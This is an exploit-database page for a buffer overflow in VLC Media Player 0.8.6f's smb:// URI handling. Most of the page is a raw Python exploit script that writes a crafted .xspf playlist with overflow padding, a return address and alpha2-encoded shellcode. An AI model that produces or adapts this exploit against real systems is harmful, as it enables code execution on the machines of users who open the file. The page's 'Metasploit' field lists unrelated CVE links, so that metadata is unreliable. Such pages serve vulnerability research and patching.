header-logo
Suggest Exploit
vendor:
VLC Media Player
by:
Pankaj Kohli
7.5
CVSS
HIGH
Buffer Overflow
119
CWE
Product Name: VLC Media Player
Affected Version From: 0.8.6f
Affected Version To: Unknown
Patch Exists: NO
Related CWE: CVE not provided
CPE: a:videolan:vlc_media_player:0.8.6f
Metasploit: https://www.rapid7.com/db/vulnerabilities/oracle_linux-cve-2023-22024/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-20212/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2022-24834/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-27395/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-22325/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/huawei-euleros-2_0_sp9-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-3326/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/amazon_linux-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/apple-osx-cups-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/amazon-linux-ami-2-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/debian-cve-2023-34241/https://www.rapid7.com/db/vulnerabilities/suse-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/ubuntu-cve-2023-3138/https://www.rapid7.com/db/vulnerabilities/freebsd-cve-2023-1825/https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=3https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=4https://www.rapid7.com/db/?q=CVE+not+provided&type=&page=2
Other Scripts:
Platforms Tested:
Unknown

VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)

This exploit takes advantage of a buffer overflow vulnerability in VLC Media Player 0.8.6f. It allows an attacker to execute arbitrary code remotely by sending a specially crafted smb:// URI. The vulnerability was discovered by Pankaj Kohli and the exploit was developed by His0k4.

Mitigation:

Update to a newer version of VLC Media Player.
Source

Exploit-DB raw data:

#!/usr/bin/python
#[*] Exploit     :      	VLC Media Player 0.8.6f smb:// URI Handling Remote BOF Exploit (univ)
#[*] Credits	 :		Pankaj Kohli
#[*] Exploit     : 		His0k4


header1=(
"\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31"
"\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22\x55\x54"
"\x46\x2d\x38\x22\x3f\x3e\x0a\x3c\x70\x6c\x61\x79\x6c\x69\x73\x74"
"\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x22\x20\x78\x6d\x6c"
"\x6e\x73\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x78\x73\x70\x66\x2e"
"\x6f\x72\x67\x2f\x6e\x73\x2f\x30\x2f\x22\x20\x78\x6d\x6c\x6e\x73"
"\x3a\x76\x6c\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77"
"\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f\x76\x6c"
"\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x6e\x73\x2f\x30\x2f"
"\x22\x3e\x0a\x09\x3c\x74\x69\x74\x6c\x65\x3e\x50\x6c\x61\x79\x6c"
"\x69\x73\x74\x3c\x2f\x74\x69\x74\x6c\x65\x3e\x0a\x09\x3c\x74\x72"
"\x61\x63\x6b\x4c\x69\x73\x74\x3e\x0a\x09\x09\x3c\x74\x72\x61\x63"
"\x6b\x3e\x0a\x09\x09\x09\x3c\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e"
"\x73\x6d\x62\x3a\x2f\x2f\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f"
"\x6d\x40\x77\x77\x77\x2e\x65\x78\x61\x6d\x70\x6c\x65\x2e\x63\x6f"
"\x6d\x2f\x66\x6f\x6f\x2f\x23\x7b")

header2=(
"\x7d\x3c\x2f\x6c\x6f\x63\x61\x74\x69\x6f\x6e\x3e\x0a\x09\x09\x09"
"\x3c\x65\x78\x74\x65\x6e\x73\x69\x6f\x6e\x20\x61\x70\x70\x6c\x69"
"\x63\x61\x74\x69\x6f\x6e\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77"
"\x77\x77\x2e\x76\x69\x64\x65\x6f\x6c\x61\x6e\x2e\x6f\x72\x67\x2f"
"\x76\x6c\x63\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x2f\x30\x22\x3e"
"\x0a\x09\x09\x09\x09\x3c\x76\x6c\x63\x3a\x69\x64\x3e\x30\x3c\x2f"
"\x76\x6c\x63\x3a\x69\x64\x3e\x0a\x09\x09\x09\x3c\x2f\x65\x78\x74"
"\x65\x6e\x73\x69\x6f\x6e\x3e\x0a\x09\x09\x3c\x2f\x74\x72\x61\x63"
"\x6b\x3e\x0a\x09\x3c\x2f\x74\x72\x61\x63\x6b\x4c\x69\x73\x74\x3e"
"\x0a\x3c\x2f\x70\x6c\x61\x79\x6c\x69\x73\x74\x3e\x0a\x0a")

#alpha2 encoded
popup_msg=(
"TY777777777777777777777777777777777QZjAXP0A0AkAAQ2AB2BB0"
"BBABXP8ABuJIXkweaHrJwpf02pQzePMhyzWwSuQnioXPOHuBxKnaQlkO"
"jpJHIvKOYokObPPwRN1uqt5PA")

payload =   header1
payload += "\x41"*96
payload += "\x4A\x21\x51\x68" # push esp;retn printable 
payload += popup_msg
payload += "\x41"*43
payload += header2

try:
    out_file = open("exploit.xspf","w")
    out_file.write(payload)
    out_file.close()
    print("\nExploit file created!\n")
except:
    print "Error"

# milw0rm.com [2009-07-31]

Navigation

Suggest Exploit

Services By CQR